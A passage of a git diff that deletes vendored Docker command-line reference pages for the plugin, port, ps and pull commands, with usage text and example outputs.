-``` - -Returns information about a plugin. By default, this command renders all results -in a JSON array. - -Example output: - -```bash -$ docker plugin inspect tiborvass/sample-volume-plugin:latest -``` -```JSON -{ - "Id": "8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21", - "Name": "tiborvass/sample-volume-plugin:latest", - "PluginReference": "tiborvas/sample-volume-plugin:latest", - "Enabled": true, - "Config": { - "Mounts": [ - { - "Name": "", - "Description": "", - "Settable": null, - "Source": "/data", - "Destination": "/data", - "Type": "bind", - "Options": [ - "shared", - "rbind" - ] - }, - { - "Name": "", - "Description": "", - "Settable": null, - "Source": null, - "Destination": "/foobar", - "Type": "tmpfs", - "Options": null - } - ], - "Env": [ - "DEBUG=1" - ], - "Args": null, - "Devices": null - }, - "Manifest": { - "ManifestVersion": "v0", - "Description": "A test plugin for Docker", - "Documentation": "https://docs.docker.com/engine/extend/plugins/", - "Interface": { - "Types": [ - "docker.volumedriver/1.0" - ], - "Socket": "plugins.sock" - }, - "Entrypoint": [ - "plugin-sample-volume-plugin", - "/data" - ], - "Workdir": "", - "User": { - }, - "Network": { - "Type": "host" - }, - "Capabilities": null, - "Mounts": [ - { - "Name": "", - "Description": "", - "Settable": null, - "Source": "/data", - "Destination": "/data", - "Type": "bind", - "Options": [ - "shared", - "rbind" - ] - }, - { - "Name": "", - "Description": "", - "Settable": null, - "Source": null, - "Destination": "/foobar", - "Type": "tmpfs", - "Options": null - } - ], - "Devices": [ - { - "Name": "device", - "Description": "a host device to mount", - "Settable": null, - "Path": "/dev/cpu_dma_latency" - } - ], - "Env": [ - { - "Name": "DEBUG", - "Description": "If set, prints debug messages", - "Settable": null, - "Value": "1" - } - ], - "Args": { - "Name": "args", - "Description": "command line arguments", - "Settable": null, - "Value": [ - - ] - } - } -} -``` -(output formatted for readability) - - -```bash -$ docker plugin inspect -f '{{.Id}}' tiborvass/sample-volume-plugin:latest -``` -``` -8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21 -``` - - -## Related information - -* [plugin create](plugin_create.md) -* [plugin enable](plugin_enable.md) -* [plugin disable](plugin_disable.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md deleted file mode 100644 index 0601193ce0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md +++ /dev/null @@ -1,71 +0,0 @@ ---- -title: "plugin install" -description: "the plugin install command description and usage" -keywords: "plugin, install" ---- - - - -# plugin install - -```markdown -Usage: docker plugin install [OPTIONS] PLUGIN [KEY=VALUE...] - -Install a plugin - -Options: - --alias string Local name for plugin - --disable Do not enable the plugin on install - --grant-all-permissions Grant all permissions necessary to run the plugin - --help Print usage -``` - -Installs and enables a plugin. Docker looks first for the plugin on your Docker -host. If the plugin does not exist locally, then the plugin is pulled from -the registry. Note that the minimum required registry version to distribute -plugins is 2.3.0 - - -The following example installs `vieus/sshfs` plugin and [set](plugin_set.md) it's env variable -`DEBUG` to 1. Install consists of pulling the plugin from Docker Hub, prompting -the user to accept the list of privileges that the plugin needs, settings parameters - and enabling the plugin. - -```bash -$ docker plugin install vieux/sshfs DEBUG=1 - -Plugin "vieux/sshfs" is requesting the following privileges: - - network: [host] - - device: [/dev/fuse] - - capabilities: [CAP_SYS_ADMIN] -Do you grant the above permissions? [y/N] y -vieux/sshfs -``` - -After the plugin is installed, it appears in the list of plugins: - -```bash -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 vieux/sshfs latest sshFS plugin for Docker true -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md deleted file mode 100644 index 7a3426d95f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md +++ /dev/null @@ -1,53 +0,0 @@ ---- -title: "plugin ls" -description: "The plugin ls command description and usage" -keywords: "plugin, list" ---- - - - -# plugin ls - -```markdown -Usage: docker plugin ls [OPTIONS] - -List plugins - -Aliases: - ls, list - -Options: - --help Print usage - --no-trunc Don't truncate output -``` - -Lists all the plugins that are currently installed. You can install plugins -using the [`docker plugin install`](plugin_install.md) command. - -Example output: - -```bash -$ docker plugin ls - -ID NAME TAG DESCRIPTION ENABLED -69553ca1d123 tiborvass/sample-volume-plugin latest A test plugin for Docker true -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md deleted file mode 100644 index e61d10994c..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md +++ /dev/null @@ -1,50 +0,0 @@ ---- -title: "plugin push" -description: "the plugin push command description and usage" -keywords: "plugin, push" ---- - - - -```markdown -Usage: docker plugin push [OPTIONS] PLUGIN[:TAG] - -Push a plugin to a registry - -Options: - --help Print usage -``` - -Use `docker plugin create` to create the plugin. Once the plugin is ready for distribution, -use `docker plugin push` to share your images to the Docker Hub registry or to a self-hosted one. - -Registry credentials are managed by [docker login](login.md). - -The following example shows how to push a sample `user/plugin`. - -```bash - -$ docker plugin ls -ID NAME TAG DESCRIPTION ENABLED -69553ca1d456 user/plugin latest A sample plugin for Docker false -$ docker plugin push user/plugin -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md deleted file mode 100644 index 323ce83f3c..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md +++ /dev/null @@ -1,56 +0,0 @@ ---- -title: "plugin rm" -description: "the plugin rm command description and usage" -keywords: "plugin, rm" ---- - - - -# plugin rm - -```markdown -Usage: docker plugin rm [OPTIONS] PLUGIN [PLUGIN...] - -Remove one or more plugins - -Aliases: - rm, remove - -Options: - -f, --force Force the removal of an active plugin - --help Print usage -``` - -Removes a plugin. You cannot remove a plugin if it is enabled, you must disable -a plugin using the [`docker plugin disable`](plugin_disable.md) before removing -it (or use --force, use of force is not recommended, since it can affect -functioning of running containers using the plugin). - -The following example disables and removes the `sample-volume-plugin:latest` plugin; - -```bash -$ docker plugin disable tiborvass/sample-volume-plugin -tiborvass/sample-volume-plugin - -$ docker plugin rm tiborvass/sample-volume-plugin:latest -tiborvass/sample-volume-plugin -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin set](plugin_set.md) -* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md deleted file mode 100644 index c206a8a760..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md +++ /dev/null @@ -1,99 +0,0 @@ ---- -title: "plugin set" -description: "the plugin set command description and usage" -keywords: "plugin, set" ---- - - - -# plugin set - -```markdown -Usage: docker plugin set PLUGIN KEY=VALUE [KEY=VALUE...] - -Change settings for a plugin - -Options: - --help Print usage -``` - -Change settings for a plugin. The plugin must be disabled. - -The settings currently supported are: - * env variables - * source of mounts - * path of devices - * args - -The following example change the env variable `DEBUG` on the -`sample-volume-plugin` plugin. - -```bash -$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin -[DEBUG=0] - -$ docker plugin set tiborvass/sample-volume-plugin DEBUG=1 - -$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin -[DEBUG=1] -``` - -The following example change the source of the `mymount` mount on -the `myplugin` plugin. - -```bash -$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin -/foo - -$ docker plugins set myplugin mymount.source=/bar - -$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin -/bar -``` - -Note: since only `source` is settable in `mymount`, `docker plugins set mymount=/bar myplugin` would work too. - -The following example change the path of the `mydevice` device on -the `myplugin` plugin. - -```bash -$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin -/dev/foo - -$ docker plugins set myplugin mydevice.path=/dev/bar - -$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin -/dev/bar -``` - -Note: since only `path` is settable in `mydevice`, `docker plugins set mydevice=/dev/bar myplugin` would work too. - -The following example change the source of the args on the `myplugin` plugin. - -```bash -$ docker plugin inspect -f '{{.Settings.Args}}' myplugin -["foo", "bar"] - -$ docker plugins set myplugin args="foo bar baz" - -$ docker plugin inspect -f '{{.Settings.Args}}' myplugin -["foo", "bar", "baz"] -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md deleted file mode 100644 index 20efc577aa..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md +++ /dev/null @@ -1,84 +0,0 @@ ---- -title: "plugin upgrade" -description: "the plugin upgrade command description and usage" -keywords: "plugin, upgrade" ---- - - - -# plugin upgrade - -```markdown -Usage: docker plugin upgrade [OPTIONS] PLUGIN [REMOTE] - -Upgrade a plugin - -Options: - --disable-content-trust Skip image verification (default true) - --grant-all-permissions Grant all permissions necessary to run the plugin - --help Print usage - --skip-remote-check Do not check if specified remote plugin matches existing plugin image -``` - -Upgrades an existing plugin to the specified remote plugin image. If no remote -is specified, Docker will re-pull the current image and use the updated version. -All existing references to the plugin will continue to work. -The plugin must be disabled before running the upgrade. - -The following example installs `vieus/sshfs` plugin, uses it to create and use -a volume, then upgrades the plugin. - -```bash -$ docker plugin install vieux/sshfs DEBUG=1 - -Plugin "vieux/sshfs:next" is requesting the following privileges: - - network: [host] - - device: [/dev/fuse] - - capabilities: [CAP_SYS_ADMIN] -Do you grant the above permissions? [y/N] y -vieux/sshfs:next - -$ docker volume create -d vieux/sshfs:next -o sshcmd=root@1.2.3.4:/tmp/shared -o password=XXX sshvolume -sshvolume -$ docker run -it -v sshvolume:/data alpine sh -c "touch /data/hello" -$ docker plugin disable -f vieux/sshfs:next -viex/sshfs:next - -# Here docker volume ls doesn't show 'sshfsvolume', since the plugin is disabled -$ docker volume ls -DRIVER VOLUME NAME - -$ docker plugin upgrade vieux/sshfs:next vieux/sshfs:next -Plugin "vieux/sshfs:next" is requesting the following privileges: - - network: [host] - - device: [/dev/fuse] - - capabilities: [CAP_SYS_ADMIN] -Do you grant the above permissions? [y/N] y -Upgrade plugin vieux/sshfs:next to vieux/sshfs:next -$ docker plugin enable vieux/sshfs:next -viex/sshfs:next -$ docker volume ls -DRIVER VOLUME NAME -viuex/sshfs:next sshvolume -$ docker run -it -v sshvolume:/data alpine sh -c "ls /data" -hello -``` - -## Related information - -* [plugin create](plugin_create.md) -* [plugin disable](plugin_disable.md) -* [plugin enable](plugin_enable.md) -* [plugin inspect](plugin_inspect.md) -* [plugin install](plugin_install.md) -* [plugin ls](plugin_ls.md) -* [plugin push](plugin_push.md) -* [plugin rm](plugin_rm.md) -* [plugin set](plugin_set.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/port.md b/vendor/github.com/docker/docker/docs/reference/commandline/port.md deleted file mode 100644 index bc90b6e786..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/port.md +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: "port" -description: "The port command description and usage" -keywords: "port, mapping, container" ---- - - - -# port - -```markdown -Usage: docker port CONTAINER [PRIVATE_PORT[/PROTO]] - -List port mappings or a specific mapping for the container - -Options: - --help Print usage -``` - -You can find out all the ports mapped by not specifying a `PRIVATE_PORT`, or -just a specific mapping: - - $ docker ps - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - b650456536c7 busybox:latest top 54 minutes ago Up 54 minutes 0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp test - $ docker port test - 7890/tcp -> 0.0.0.0:4321 - 9876/tcp -> 0.0.0.0:1234 - $ docker port test 7890/tcp - 0.0.0.0:4321 - $ docker port test 7890/udp - 2014/06/24 11:53:36 Error: No public port '7890/udp' published for test - $ docker port test 7890 - 0.0.0.0:4321 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md deleted file mode 100644 index 1d5f31da88..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md +++ /dev/null @@ -1,384 +0,0 @@ ---- -title: "ps" -description: "The ps command description and usage" -keywords: "container, running, list" ---- - - - -# ps - -```markdown -Usage: docker ps [OPTIONS] - -List containers - -Options: - -a, --all Show all containers (default shows just running) - -f, --filter value Filter output based on conditions provided (default []) - - exited= an exit code of - - label= or label== - - status=(created|restarting|removing|running|paused|exited) - - name= a container's name - - id= a container's ID - - before=(|) - - since=(|) - - ancestor=([:tag]||) - containers created from an image or a descendant. - - is-task=(true|false) - - health=(starting|healthy|unhealthy|none) - --format string Pretty-print containers using a Go template - --help Print usage - -n, --last int Show n last created containers (includes all states) (default -1) - -l, --latest Show the latest created container (includes all states) - --no-trunc Don't truncate output - -q, --quiet Only display numeric IDs - -s, --size Display total file sizes -``` - -Running `docker ps --no-trunc` showing 2 linked containers. - -```bash -$ docker ps - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -4c01db0b339c ubuntu:12.04 bash 17 seconds ago Up 16 seconds 3300-3310/tcp webapp -d7886598dbe2 crosbymichael/redis:latest /redis-server --dir 33 minutes ago Up 33 minutes 6379/tcp redis,webapp/db -``` - -The `docker ps` command only shows running containers by default. To see all -containers, use the `-a` (or `--all`) flag: - -```bash -$ docker ps -a -``` - -`docker ps` groups exposed ports into a single range if possible. E.g., a -container that exposes TCP ports `100, 101, 102` displays `100-102/tcp` in -the `PORTS` column. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more -than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* id (container's id) -* label (`label=` or `label==`) -* name (container's name) -* exited (int - the code of exited containers. Only useful with `--all`) -* status (created|restarting|running|removing|paused|exited|dead) -* ancestor (`[:]`, `` or ``) - filters containers that were created from the given image or a descendant. -* before (container's id or name) - filters containers created before given id or name -* since (container's id or name) - filters containers created since given id or name -* isolation (default|process|hyperv) (Windows daemon only) -* volume (volume name or mount point) - filters containers that mount volumes. -* network (network id or name) - filters containers connected to the provided network -* health (starting|healthy|unhealthy|none) - filters containers based on healthcheck status - -#### Label - -The `label` filter matches containers based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches containers with the `color` label regardless of its value. - -```bash -$ docker ps --filter "label=color" - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -673394ef1d4c busybox "top" 47 seconds ago Up 45 seconds nostalgic_shockley -d85756f57265 busybox "top" 52 seconds ago Up 51 seconds high_albattani -``` - -The following filter matches containers with the `color` label with the `blue` value. - -```bash -$ docker ps --filter "label=color=blue" - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -d85756f57265 busybox "top" About a minute ago Up About a minute high_albattani -``` - -#### Name - -The `name` filter matches on all or part of a container's name. - -The following filter matches all containers with a name containing the `nostalgic_stallman` string. - -```bash -$ docker ps --filter "name=nostalgic_stallman" - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9b6247364a03 busybox "top" 2 minutes ago Up 2 minutes nostalgic_stallman -``` - -You can also filter for a substring in a name as this shows: - -```bash -$ docker ps --filter "name=nostalgic" - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -715ebfcee040 busybox "top" 3 seconds ago Up 1 second i_am_nostalgic -9b6247364a03 busybox "top" 7 minutes ago Up 7 minutes nostalgic_stallman -673394ef1d4c busybox "top" 38 minutes ago Up 38 minutes nostalgic_shockley -``` - -#### Exited - -The `exited` filter matches containers by exist status code. For example, to -filter for containers that have exited successfully: - -```bash -$ docker ps -a --filter 'exited=0' - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -ea09c3c82f6e registry:latest /srv/run.sh 2 weeks ago Exited (0) 2 weeks ago 127.0.0.1:5000->5000/tcp desperate_leakey -106ea823fe4e fedora:latest /bin/sh -c 'bash -l' 2 weeks ago Exited (0) 2 weeks ago determined_albattani -48ee228c9464 fedora:20 bash 2 weeks ago Exited (0) 2 weeks ago tender_torvalds -``` - -#### Killed containers - -You can use a filter to locate containers that exited with status of `137` -meaning a `SIGKILL(9)` killed them. - -```bash -$ docker ps -a --filter 'exited=137' -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -b3e1c0ed5bfe ubuntu:latest "sleep 1000" 12 seconds ago Exited (137) 5 seconds ago grave_kowalevski -a2eb5558d669 redis:latest "/entrypoint.sh redi 2 hours ago Exited (137) 2 hours ago sharp_lalande -``` - -Any of these events result in a `137` status: - -* the `init` process of the container is killed manually -* `docker kill` kills the container -* Docker daemon restarts which kills all running containers - -#### Status - -The `status` filter matches containers by status. You can filter using -`created`, `restarting`, `running`, `removing`, `paused`, `exited` and `dead`. For example, -to filter for `running` containers: - -```bash -$ docker ps --filter status=running - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -715ebfcee040 busybox "top" 16 minutes ago Up 16 minutes i_am_nostalgic -d5c976d3c462 busybox "top" 23 minutes ago Up 23 minutes top -9b6247364a03 busybox "top" 24 minutes ago Up 24 minutes nostalgic_stallman -``` - -To filter for `paused` containers: - -```bash -$ docker ps --filter status=paused - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -673394ef1d4c busybox "top" About an hour ago Up About an hour (Paused) nostalgic_shockley -``` - -#### Ancestor - -The `ancestor` filter matches containers based on its image or a descendant of -it. The filter supports the following image representation: - -- image -- image:tag -- image:tag@digest -- short-id -- full-id - -If you don't specify a `tag`, the `latest` tag is used. For example, to filter -for containers that use the latest `ubuntu` image: - -```bash -$ docker ps --filter ancestor=ubuntu - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -919e1179bdb8 ubuntu-c1 "top" About a minute ago Up About a minute admiring_lovelace -5d1e4a540723 ubuntu-c2 "top" About a minute ago Up About a minute admiring_sammet -82a598284012 ubuntu "top" 3 minutes ago Up 3 minutes sleepy_bose -bab2a34ba363 ubuntu "top" 3 minutes ago Up 3 minutes focused_yonath -``` - -Match containers based on the `ubuntu-c1` image which, in this case, is a child -of `ubuntu`: - -```bash -$ docker ps --filter ancestor=ubuntu-c1 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -919e1179bdb8 ubuntu-c1 "top" About a minute ago Up About a minute admiring_lovelace -``` - -Match containers based on the `ubuntu` version `12.04.5` image: - -```bash -$ docker ps --filter ancestor=ubuntu:12.04.5 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -82a598284012 ubuntu:12.04.5 "top" 3 minutes ago Up 3 minutes sleepy_bose -``` - -The following matches containers based on the layer `d0e008c6cf02` or an image -that have this layer in its layer stack. - -```bash -$ docker ps --filter ancestor=d0e008c6cf02 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -82a598284012 ubuntu:12.04.5 "top" 3 minutes ago Up 3 minutes sleepy_bose -``` - -#### Before - -The `before` filter shows only containers created before the container with -given id or name. For example, having these containers created: - -```bash -$ docker ps - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9c3527ed70ce busybox "top" 14 seconds ago Up 15 seconds desperate_dubinsky -4aace5031105 busybox "top" 48 seconds ago Up 49 seconds focused_hamilton -6e63f6ff38b0 busybox "top" About a minute ago Up About a minute distracted_fermat -``` - -Filtering with `before` would give: - -```bash -$ docker ps -f before=9c3527ed70ce - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -4aace5031105 busybox "top" About a minute ago Up About a minute focused_hamilton -6e63f6ff38b0 busybox "top" About a minute ago Up About a minute distracted_fermat -``` - -#### Since - -The `since` filter shows only containers created since the container with given -id or name. For example, with the same containers as in `before` filter: - -```bash -$ docker ps -f since=6e63f6ff38b0 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9c3527ed70ce busybox "top" 10 minutes ago Up 10 minutes desperate_dubinsky -4aace5031105 busybox "top" 10 minutes ago Up 10 minutes focused_hamilton -``` - -#### Volume - -The `volume` filter shows only containers that mount a specific volume or have -a volume mounted in a specific path: - -```bash{% raw %} -$ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}" -CONTAINER ID MOUNTS -9c3527ed70ce remote-volume - -$ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}" -CONTAINER ID MOUNTS -9c3527ed70ce remote-volume -{% endraw %}``` - -#### Network - -The `network` filter shows only containers that are connected to a network with -a given name or id. - -The following filter matches all containers that are connected to a network -with a name containing `net1`. - -```bash -$ docker run -d --net=net1 --name=test1 ubuntu top -$ docker run -d --net=net2 --name=test2 ubuntu top - -$ docker ps --filter network=net1 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9d4893ed80fe ubuntu "top" 10 minutes ago Up 10 minutes test1 -``` - -The network filter matches on both the network's name and id. The following -example shows all containers that are attached to the `net1` network, using -the network id as a filter; - -```bash -{% raw %} -$ docker network inspect --format "{{.ID}}" net1 -{% endraw %} - -8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5 - -$ docker ps --filter network=8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9d4893ed80fe ubuntu "top" 10 minutes ago Up 10 minutes test1 -``` - -## Formatting - -The formatting option (`--format`) pretty-prints container output using a Go -template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ---------------|---------------------------------------------------------------------------------------------------- -`.ID` | Container ID -`.Image` | Image ID -`.Command` | Quoted command -`.CreatedAt` | Time when the container was created. -`.RunningFor` | Elapsed time since the container was started. -`.Ports` | Exposed ports. -`.Status` | Container status. -`.Size` | Container disk size. -`.Names` | Container names. -`.Labels` | All labels assigned to the container. -`.Label` | Value of a specific label for this container. For example `'{% raw %}{{.Label "com.docker.swarm.cpu"}}{% endraw %}'` -`.Mounts` | Names of the volumes mounted in this container. -`.Networks` | Names of the networks attached to this container. - -When using the `--format` option, the `ps` command will either output the data -exactly as the template declares or, when using the `table` directive, includes -column headers as well. - -The following example uses a template without headers and outputs the `ID` and -`Command` entries separated by a colon for all running containers: - -```bash -{% raw %} -$ docker ps --format "{{.ID}}: {{.Command}}" -{% endraw %} - -a87ecb4f327c: /bin/sh -c #(nop) MA -01946d9d34d8: /bin/sh -c #(nop) MA -c1d3b0166030: /bin/sh -c yum -y up -41d50ecd2f57: /bin/sh -c #(nop) MA -``` - -To list all running containers with their labels in a table format you can use: - -```bash -{% raw %} -$ docker ps --format "table {{.ID}}\t{{.Labels}}" -{% endraw %} - -CONTAINER ID LABELS -a87ecb4f327c com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd -01946d9d34d8 -c1d3b0166030 com.docker.swarm.node=debian,com.docker.swarm.cpu=6 -41d50ecd2f57 com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md deleted file mode 100644 index 0c960b404a..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md +++ /dev/null @@ -1,252 +0,0 @@ ---- -title: "pull" -description: "The pull command description and usage" -keywords: "pull, image, hub, docker" ---- - - - -# pull - -```markdown -Usage: docker pull [OPTIONS] NAME[:TAG|@DIGEST] - -Pull an image or a repository from a registry - -Options: - -a, --all-tags Download all tagged images in the repository - --disable-content-trust Skip image verification (default true) - --help Print usage -``` - -Most of your images will be created on top of a base image from the -[Docker Hub](https://hub.docker.com) registry. - -[Docker Hub](https://hub.docker.com) contains many pre-built images that you -can `pull` and try without needing to define and configure your own. - -To download a particular image, or set of images (i.e., a repository), -use `docker pull`. - -## Proxy configuration - -If you are behind an HTTP proxy server, for example in corporate settings, -before open a connect to registry, you may need to configure the Docker -daemon's proxy settings, using the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY` -environment variables. To set these environment variables on a host using -`systemd`, refer to the [control and configure Docker with systemd](https://docs.docker.com/engine/admin/systemd/#http-proxy) -for variables configuration. - -## Concurrent downloads - -By default the Docker daemon will pull three layers of an image at a time. -If you are on a low bandwidth connection this may cause timeout issues and you may want to lower -this via the `--max-concurrent-downloads` daemon option. See the -[daemon documentation](dockerd.md) for more details. - -## Examples - -### Pull an image from Docker Hub - -To download a particular image, or set of images (i.e., a repository), use -`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a -default. This command pulls the `debian:latest` image: - -```bash -$ docker pull debian - -Using default tag: latest -latest: Pulling from library/debian -fdd5d7827f33: Pull complete -a3ed95caeb02: Pull complete -Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa -Status: Downloaded newer image for debian:latest -``` - -Docker images can consist of multiple layers. In the example above, the image -consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`. - -Layers can be reused by images. For example, the `debian:jessie` image shares -both layers with `debian:latest`. Pulling the `debian:jessie` image therefore -only pulls its metadata, but not its layers, because all layers are already -present locally: - -```bash -$ docker pull debian:jessie - -jessie: Pulling from library/debian -fdd5d7827f33: Already exists -a3ed95caeb02: Already exists -Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e -Status: Downloaded newer image for debian:jessie -``` - -To see which images are present locally, use the [`docker images`](images.md) -command: - -```bash -$ docker images - -REPOSITORY TAG IMAGE ID CREATED SIZE -debian jessie f50f9524513f 5 days ago 125.1 MB -debian latest f50f9524513f 5 days ago 125.1 MB -``` - -Docker uses a content-addressable image store, and the image ID is a SHA256 -digest covering the image's configuration and layers. In the example above, -`debian:jessie` and `debian:latest` have the same image ID because they are -actually the *same* image tagged with different names. Because they are the -same image, their layers are stored only once and do not consume extra disk -space. - -For more information about images, layers, and the content-addressable store, -refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/). - - -## Pull an image by digest (immutable identifier) - -So far, you've pulled images by their name (and "tag"). Using names and tags is -a convenient way to work with images. When using tags, you can `docker pull` an -image again to make sure you have the most up-to-date version of that image. -For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu -14.04 image. - -In some cases you don't want images to be updated to newer versions, but prefer -to use a fixed version of an image. Docker enables you to pull an image by its -*digest*. When pulling an image by digest, you specify *exactly* which version -of an image to pull. Doing so, allows you to "pin" an image to that version, -and guarantee that the image you're using is always the same. - -To know the digest of an image, pull the image first. Let's pull the latest -`ubuntu:14.04` image from Docker Hub: - -```bash -$ docker pull ubuntu:14.04 - -14.04: Pulling from library/ubuntu -5a132a7e7af1: Pull complete -fd2731e4c50c: Pull complete -28a2f68d1120: Pull complete -a3ed95caeb02: Pull complete -Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 -Status: Downloaded newer image for ubuntu:14.04 -``` - -Docker prints the digest of the image after the pull has finished. In the example -above, the digest of the image is: - - sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - -Docker also prints the digest of an image when *pushing* to a registry. This -may be useful if you want to pin to a version of the image you just pushed. - -A digest takes the place of the tag when pulling an image, for example, to -pull the above image by digest, run the following command: - -```bash -$ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - -sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu -5a132a7e7af1: Already exists -fd2731e4c50c: Already exists -28a2f68d1120: Already exists -a3ed95caeb02: Already exists 